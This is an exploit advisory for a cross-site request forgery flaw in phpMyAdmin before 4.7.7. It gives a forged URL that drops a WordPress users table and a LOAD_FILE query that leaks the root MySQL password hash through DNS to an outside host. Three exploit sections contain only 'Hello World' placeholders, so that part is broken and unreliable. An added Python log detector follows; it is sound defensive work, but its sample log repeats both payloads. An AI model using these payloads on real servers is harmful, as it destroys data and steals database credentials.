# Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery
# Date: 2018-08-28
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.phpmyadmin.net/
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: Versions 4.7.x (prior to 4.7.7)
# Tested on: php7 mysql5
# CVE: CVE-2017-1000499
# Original Exploit Author: Ashutosh Barot (www.twitter.com/ashu_barot)
#
# If the victim DB admin has an active session with phpMyAdmin < 4.7.7, hitting this URL will result in a DROP TABLE:
# https://example.com/phpMyAdmin/sql.php?db=DATABASE_NAME&goto=db_structure.php&table=wp_users&reload=1&purge=1&sql_query=DROP+TABLE+%60wp_users%60&message_to_show=Table+wp_users+has+been+dropped

# Exploit CSRF - Modifying the password of current user

Hello World

# Exploit CSRF - Arbitrary File Write

Hello World

# Exploit CSRF - Data Retrieval over DNS

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.vulnspy.com\\test'));

# Exploit CSRF - Empty All Rows From All Tables

Hello World
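The two request shapes the advisory shows (a forged GET to sql.php whose sql_query parameter carries DROP TABLE, and one carrying a LOAD_FILE() UNC exfiltration query) are visible in ordinary web-server access logs. The following is an added detection example, not part of the advisory or of phpMyAdmin's own code: it scans combined-log-format lines for GET requests to sql.php whose sql_query parameter contains a state-changing or file-reading statement, and marks those arriving with a foreign or missing Referer as likely cross-site. The log lines, the app path /phpMyAdmin/, the client addresses and the attacker hostnames are all constructed for the example.

```python
"""Detection helper for the phpMyAdmin < 4.7.7 CSRF pattern (CVE-2017-1000499).

Added example, not part of the original advisory. It scans web-server access
log lines for GET requests to sql.php that carry a state-changing or
file-reading statement in the ``sql_query`` query-string parameter, which is
the shape of the forged links in the advisory. Log format, sample lines,
hostnames and addresses below are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Statements a forged GET link to sql.php typically carries; legitimate
# browsing of a table is a plain SELECT and is not matched here.
DANGEROUS = re.compile(
    r"^\s*(DROP|DELETE|TRUNCATE|UPDATE|ALTER|INSERT|SET\s+PASSWORD|GRANT)\b"
    r"|\bLOAD_FILE\s*\(|\bINTO\s+(OUTFILE|DUMPFILE)\b",
    re.IGNORECASE,
)

# Combined log format: ip ident user [time] "METHOD target PROTO" status bytes "referer"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)")?'
)

# Constructed sample log (not real traffic). Line 1: forged DROP TABLE from a
# lure page; line 2: normal browsing; line 3: a POST, out of scope; line 4:
# LOAD_FILE exfiltration with no Referer; line 5: the same DROP but issued from
# inside the application, i.e. the admin clicked the real UI link.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Aug/2018:10:00:00 +0000] "GET /phpMyAdmin/sql.php?db=app&goto=db_structure.php&table=wp_users&reload=1&purge=1&sql_query=DROP+TABLE+%60wp_users%60&message_to_show=Table+wp_users+has+been+dropped HTTP/1.1" 200 5123 "http://lure.example/page.html"
203.0.113.7 - - [28/Aug/2018:10:00:05 +0000] "GET /phpMyAdmin/sql.php?db=app&table=wp_users&sql_query=SELECT+*+FROM+wp_users+LIMIT+30 HTTP/1.1" 200 9912 "https://example.com/phpMyAdmin/db_structure.php?db=app"
203.0.113.7 - - [28/Aug/2018:10:00:09 +0000] "POST /phpMyAdmin/sql.php HTTP/1.1" 200 300 "https://example.com/phpMyAdmin/db_structure.php?db=app"
198.51.100.23 - - [28/Aug/2018:10:01:00 +0000] "GET /phpMyAdmin/sql.php?db=app&sql_query=SELECT+LOAD_FILE(CONCAT(%27%5C%5C%5C%5C%27,(SELECT+password+FROM+mysql.user+WHERE+user%3D%27root%27+LIMIT+1),%27.attacker-dns.example%5C%5Ctest%27)) HTTP/1.1" 200 412 "-"
203.0.113.7 - - [28/Aug/2018:10:02:00 +0000] "GET /phpMyAdmin/sql.php?db=app&goto=db_structure.php&table=wp_logs&reload=1&purge=1&sql_query=DROP+TABLE+%60wp_logs%60 HTTP/1.1" 200 5123 "https://example.com/phpMyAdmin/db_structure.php?db=app"
"""


def check_line(line, app_path="/phpMyAdmin/"):
    """Return a finding dict for a suspicious sql.php GET, or None.

    app_path is the URL prefix the phpMyAdmin instance is served under; a
    Referer that does not contain it (or is absent) means the request did
    not originate from the application's own pages.
    """
    m = LOG_RE.match(line)
    if not m or m.group("method") != "GET":
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/sql.php"):
        return None
    # parse_qs decodes '+' and %XX escapes, so we see the statement as MySQL would.
    sql = parse_qs(parts.query).get("sql_query", [""])[0]
    if not sql or not DANGEROUS.search(sql):
        return None
    referer = m.group("referer") or ""
    if referer == "-":  # CLF placeholder for "no Referer header"
        referer = ""
    return {
        "ip": m.group("ip"),
        "sql": sql,
        "referer": referer,
        "cross_site": (not referer) or (app_path not in referer),
    }


def scan(lines, app_path="/phpMyAdmin/"):
    """Run check_line over an iterable of log lines and collect the findings."""
    findings = []
    for line in lines:
        finding = check_line(line, app_path)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        tag = "CROSS-SITE" if f["cross_site"] else "same-app "
        print(f"{tag} {f['ip']:<15} {f['sql'][:60]!r} referer={f['referer'] or '(none)'}")
```

Because phpMyAdmin before 4.7.7 issued its own table-drop links as GETs, the "same-app" hits are expected noise; the useful alert is the subset with a foreign or missing Referer, and a sql_query containing LOAD_FILE or INTO OUTFILE is worth a ticket regardless of origin. The same logic can be hosted in any log pipeline that exposes method, path, query string and Referer.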